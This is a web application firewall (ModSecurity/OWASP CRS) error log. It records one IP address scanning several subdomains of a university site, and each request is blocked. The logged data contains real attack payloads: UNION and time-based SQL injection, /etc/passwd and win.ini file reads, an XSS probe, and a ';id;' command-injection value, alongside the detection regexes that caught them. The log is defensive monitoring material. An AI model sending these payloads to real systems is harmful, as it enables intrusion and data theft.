[Tue Aug 29 11:40:37.438896 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12xcCo-f0AAAcqJEEAAAAG"]
[Tue Aug 29 11:40:37.440085 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAQSWm8AAAA0"]
[Tue Aug 29 11:40:39.356466 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcPiyoAAAAa"]
[Tue Aug 29 11:40:39.363982 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcjAjsAAAAw"]
[Tue Aug 29 11:40:39.425751 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcjAjwAAAAw"]
[Tue Aug 29 11:40:39.485096 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcPiy0AAAAa"]
[Tue Aug 29 11:40:39.529144 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcjAj8AAAAw"]
[Tue Aug 29 11:40:40.370497 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAXbcM4AAAAL"]
[Tue Aug 29 11:40:40.390359 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAXbcM8AAAAL"]
[Tue Aug 29 11:40:40.435410 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12yMCo-f0AAAXbcNEAAAAL"]
[Tue Aug 29 11:40:41.411598 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12ycCo-f0AAAYf-IgAAAAD"]
[Tue Aug 29 11:40:43.411699 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12y8Co-f0AAAcYU4UAAAAp"]
[Tue Aug 29 11:40:44.558995 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAXbcOMAAAAL"]
[Tue Aug 29 11:40:44.579773 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAcVJQcAAAAB"]
[Tue Aug 29 11:40:44.589655 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcPizkAAAAa"]
[Tue Aug 29 11:40:44.599634 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAaHMf4AAAAE"]
[Tue Aug 29 11:40:44.600702 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcVJQgAAAAB"]
[Tue Aug 29 11:40:44.605431 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAYf-JYAAAAD"]
[Tue Aug 29 11:40:44.620221 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12zMCo-f0AAAaHMf8AAAAE"]
[Tue Aug 29 11:40:44.628326 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAYf-JcAAAAD"]
[Tue Aug 29 11:40:44.631540 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcPizsAAAAa"]
[Tue Aug 29 11:40:44.661483 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAcVJQsAAAAB"]
[Tue Aug 29 11:40:45.374327 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zcCo-f0AAAaHMgEAAAAE"]
[Tue Aug 29 11:40:46.419780 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAaHMgQAAAAE"]
[Tue Aug 29 11:40:46.433212 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcVJQ8AAAAB"]
[Tue Aug 29 11:40:46.439992 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcYU48AAAAp"]
